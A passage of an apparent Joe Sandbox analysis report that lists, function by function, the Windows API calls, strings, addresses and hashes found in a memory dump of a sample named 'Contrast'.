                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                        • Opcode ID: ae29157b5c0be327e8b04336ff3311bb81980d4744f6b1849c435669a3ef17be
                                                                                                                                        • Instruction ID: 93244bb11812af4f48c2e0c1efc531d25c6bd1299b80f8590a7975eca6470311
                                                                                                                                        • Opcode Fuzzy Hash: ae29157b5c0be327e8b04336ff3311bb81980d4744f6b1849c435669a3ef17be
                                                                                                                                        • Instruction Fuzzy Hash: 29916D71A0021AABDF24DFA5C849FAEBBB8FF45710F14855DE915BB280D7709944CFA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00567D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?,?,00568073), ref: 00567D45
                                                                                                                                          • Part of subcall function 00567D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D60
                                                                                                                                          • Part of subcall function 00567D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?,?), ref: 00567D6E
                                                                                                                                          • Part of subcall function 00567D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00567C62,80070057,?), ref: 00567D7E
                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00589EF0
                                                                                                                                        • _memset.LIBCMT ref: 00589EFD
                                                                                                                                        • _memset.LIBCMT ref: 0058A040
                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0058A06C
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0058A077
                                                                                                                                        Strings
                                                                                                                                        • NULL Pointer assignment, xrefs: 0058A0C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                        • Opcode ID: ac0d76719ac2a28452c741f6bbf290e6187f1778da91fe4cac95ba40876ac690
                                                                                                                                        • Instruction ID: b566d482c518256990d7bbdf8b7900d6f1f7c9708586f140e5414b4924399a12
                                                                                                                                        • Opcode Fuzzy Hash: ac0d76719ac2a28452c741f6bbf290e6187f1778da91fe4cac95ba40876ac690
                                                                                                                                        • Instruction Fuzzy Hash: 55913971D00229EBDB10EFA0D849ADEBBB8BF59310F10415AF919B7281DB715A44CFA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00597449
                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0059745D
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00597477
                                                                                                                                        • _wcscat.LIBCMT ref: 005974D2
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 005974E9
                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00597517
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                                        • String ID: SysListView32
                                                                                                                                        • API String ID: 307300125-78025650
                                                                                                                                        • Opcode ID: 16015031f6ba393625730aa0191085531529bd84d548eca985727ef885fc6b12
                                                                                                                                        • Instruction ID: 7cbc18203f948f132d487b85e7517d94ac3f8353c88a8f5719d8072e8cc91432
                                                                                                                                        • Opcode Fuzzy Hash: 16015031f6ba393625730aa0191085531529bd84d548eca985727ef885fc6b12
                                                                                                                                        • Instruction Fuzzy Hash: 1741A070A14309AFEF219F64CC85BEE7FA8FF48350F10442AF988A7292D6719D84DB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00574148: CreateToolhelp32Snapshot.KERNEL32 ref: 0057416D
                                                                                                                                          • Part of subcall function 00574148: Process32FirstW.KERNEL32(00000000,?), ref: 0057417B
                                                                                                                                          • Part of subcall function 00574148: CloseHandle.KERNEL32(00000000), ref: 00574245
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058F08D
                                                                                                                                        • GetLastError.KERNEL32 ref: 0058F0A0
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058F0CF
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0058F14C
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0058F157
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0058F18C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                                        • Opcode ID: f1c63b7bdbcb761b4ada819f3e640979c813c6e479fe76624382c97618112720
                                                                                                                                        • Instruction ID: 23a027c99310d0526426de2fa2848c50b0d8ac78a5e8b4c9a0f174cde766880f
                                                                                                                                        • Opcode Fuzzy Hash: f1c63b7bdbcb761b4ada819f3e640979c813c6e479fe76624382c97618112720
                                                                                                                                        • Instruction Fuzzy Hash: 1B41C0703002029FDB11EF24DC99FADBBA5BF99714F04842DF8465B2D2CB70A844CB95
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00574802
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00574809
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057481F
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00574826
                                                                                                                                        • _wprintf.LIBCMT ref: 0057484C
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057486A
                                                                                                                                        Strings
                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00574847
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                        • API String ID: 3648134473-3128320259
                                                                                                                                        • Opcode ID: a4ddb733b45a8937a994ae3a3b1aeb7b8a83367da29dc5b1973fedacff317b46
                                                                                                                                        • Instruction ID: 01fdce788b68b5b48921714d3fe760f521f6b6055972e7a7805da65b585b1d17
                                                                                                                                        • Opcode Fuzzy Hash: a4ddb733b45a8937a994ae3a3b1aeb7b8a83367da29dc5b1973fedacff317b46
                                                                                                                                        • Instruction Fuzzy Hash: 2201A2F280020C7FE711ABA09D89EF77B6CE709300F004595B709E3081EB309E889B71
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0059DB42
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0059DB62
                                                                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059DD9D
                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059DDBB
                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059DDDC
                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0059DDFB
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0059DE20
                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0059DE43
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1211466189-0
                                                                                                                                        • Opcode ID: 8e16421a43ac1238d713d9f585a438d166e3801750b12b926b314715706cbd9d
                                                                                                                                        • Instruction ID: 6fe363f490dccee1fed80e4e6e2c8778f78fd3951ac744065cdae1bb5605b925
                                                                                                                                        • Opcode Fuzzy Hash: 8e16421a43ac1238d713d9f585a438d166e3801750b12b926b314715706cbd9d
                                                                                                                                        • Instruction Fuzzy Hash: 50B18731600219AFDF14CF69C9857AE7BB1FF48701F08806AED48AF295D734A994DBA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059044E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479070676-0
                                                                                                                                        • Opcode ID: 4c8c71df0c80b409df3560efa33664da82af2dd65c51df3891cd668e5e31706a
                                                                                                                                        • Instruction ID: 46ca1bf69e6597035fa056d520c4abf003cc50b36b46acd74349ed828e6bd5b5
                                                                                                                                        • Opcode Fuzzy Hash: 4c8c71df0c80b409df3560efa33664da82af2dd65c51df3891cd668e5e31706a
                                                                                                                                        • Instruction Fuzzy Hash: 58A17A702042029FCB10EF24D889B6EBBE5FF85314F14991DF5969B2A2DB31E985CF46
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 00512E9F
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000,000000FF), ref: 00512EE7
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 0054C55B
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C508,00000004,00000000,00000000,00000000), ref: 0054C5C7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                        • Opcode ID: ad6cff9c45d36fdde815d8c657f531f147f2ebbf7eeb4fd7577564bceca6f6f3
                                                                                                                                        • Instruction ID: c8d9f16b569658384d9d68eaa998ca695bab6900dad9da22e15bf3dbfcf05989
                                                                                                                                        • Opcode Fuzzy Hash: ad6cff9c45d36fdde815d8c657f531f147f2ebbf7eeb4fd7577564bceca6f6f3
                                                                                                                                        • Instruction Fuzzy Hash: E941EB306096849AEB75872888CC7FA7FDABBD6304F544A0EE447876A0D771B9E4E710
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00577698
                                                                                                                                          • Part of subcall function 00530FE6: std::exception::exception.LIBCMT ref: 0053101C
                                                                                                                                          • Part of subcall function 00530FE6: __CxxThrowException@8.LIBCMT ref: 00531031
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005776CF
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 005776EB
                                                                                                                                        • _memmove.LIBCMT ref: 00577739
                                                                                                                                        • _memmove.LIBCMT ref: 00577756
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00577765
                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0057777A
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00577799
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 256516436-0
                                                                                                                                        • Opcode ID: 85d22d05e251d2c292e38964eaafad0a2ef1f8254373b273d5236cb55db61018
                                                                                                                                        • Instruction ID: b868fc29667ff6f2f4421572dff2496efaeedf6ce03f45a08cbdc5f2e1dc64bb
                                                                                                                                        • Opcode Fuzzy Hash: 85d22d05e251d2c292e38964eaafad0a2ef1f8254373b273d5236cb55db61018
                                                                                                                                        • Instruction Fuzzy Hash: 41315235904209EBDB14DF64DC89EAEBB78FF85310F1480A5F904AB296D730DA54DB64
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00596810
                                                                                                                                        • GetDC.USER32(00000000), ref: 00596818
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00596823
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0059682F
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0059686B
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0059687C
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0059964F,?,?,000000FF,00000000,?,000000FF,?), ref: 005968B6
                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005968D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                        • Opcode ID: fef2d64e824bbdb232d4f43e0adf817a94d56fe0eb27e93a3f140852fb3dfb00
                                                                                                                                        • Instruction ID: bb3e3d8125c1b56feec48b3ebe52dd81001dd5f6492ad3b8403838f336e469d5
                                                                                                                                        • Opcode Fuzzy Hash: fef2d64e824bbdb232d4f43e0adf817a94d56fe0eb27e93a3f140852fb3dfb00
                                                                                                                                        • Instruction Fuzzy Hash: 9B317872211210BFEF108F108C8AFAB3FADFB5A765F040065FE08AA291C6759855CBB0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: f304b602262842f1bbc4de9cdc2873e5324c3703b7d627de5b01b77f79844cf2
                                                                                                                                        • Instruction ID: 6b26ac2281c492be2ce535d6cfba012c6cb6283e8d71bc30444833c941315c99
                                                                                                                                        • Opcode Fuzzy Hash: f304b602262842f1bbc4de9cdc2873e5324c3703b7d627de5b01b77f79844cf2
                                                                                                                                        • Instruction Fuzzy Hash: 022104727016067B971476628E87FBF3F6CFE62798F048028FD46A7642E710DE11CAA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                        • _wcstok.LIBCMT ref: 0057F2D7
                                                                                                                                        • _wcscpy.LIBCMT ref: 0057F366
                                                                                                                                        • _memset.LIBCMT ref: 0057F399
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                        • Opcode ID: 5be727bf4a87ef2cc45d85abada1e42ecb53944d6cf8f49d594988e6accd8de3
                                                                                                                                        • Instruction ID: 95c2ab025eba55e4994fdb9239a2b4da371c0b06ca013196f761eb8db50338c8
                                                                                                                                        • Opcode Fuzzy Hash: 5be727bf4a87ef2cc45d85abada1e42ecb53944d6cf8f49d594988e6accd8de3
                                                                                                                                        • Instruction Fuzzy Hash: 06C1AF715047529FD714EF64E849A5BBFE4BF95310F00892DF899972A2DB30EC45CB82
                                                                                                                                        APIs
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005872EB
                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0058730C
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0058731F
                                                                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 005873D5
                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00587392
                                                                                                                                          • Part of subcall function 0056B4EA: _strlen.LIBCMT ref: 0056B4F4
                                                                                                                                          • Part of subcall function 0056B4EA: _memmove.LIBCMT ref: 0056B516
                                                                                                                                        • _strlen.LIBCMT ref: 0058742F
                                                                                                                                        • _memmove.LIBCMT ref: 00587498
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3619996494-0
                                                                                                                                        • Opcode ID: b491bb7d7641d38eb48d037658ec11d8b7fd1267bf3efbd6a69422ab91c49a4b
                                                                                                                                        • Instruction ID: 4a8acf8e72566b469f64aa04e7e11473776d9e8e0ed758f30062fbd6447b5147
                                                                                                                                        • Opcode Fuzzy Hash: b491bb7d7641d38eb48d037658ec11d8b7fd1267bf3efbd6a69422ab91c49a4b
                                                                                                                                        • Instruction Fuzzy Hash: 4081D371108205ABD710EB24DC89E6BBFA8FFD9714F204918F956AB2E2DB70DD41CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e9f4a077e6d33a3c3d1e4aa14f9073033225d2d137ecc000310d27cef4e02530
                                                                                                                                        • Instruction ID: 19fd308ae820840d16e9e65605ca18f4237456ecd5625aa906dad16c209d1ecc
                                                                                                                                        • Opcode Fuzzy Hash: e9f4a077e6d33a3c3d1e4aa14f9073033225d2d137ecc000310d27cef4e02530
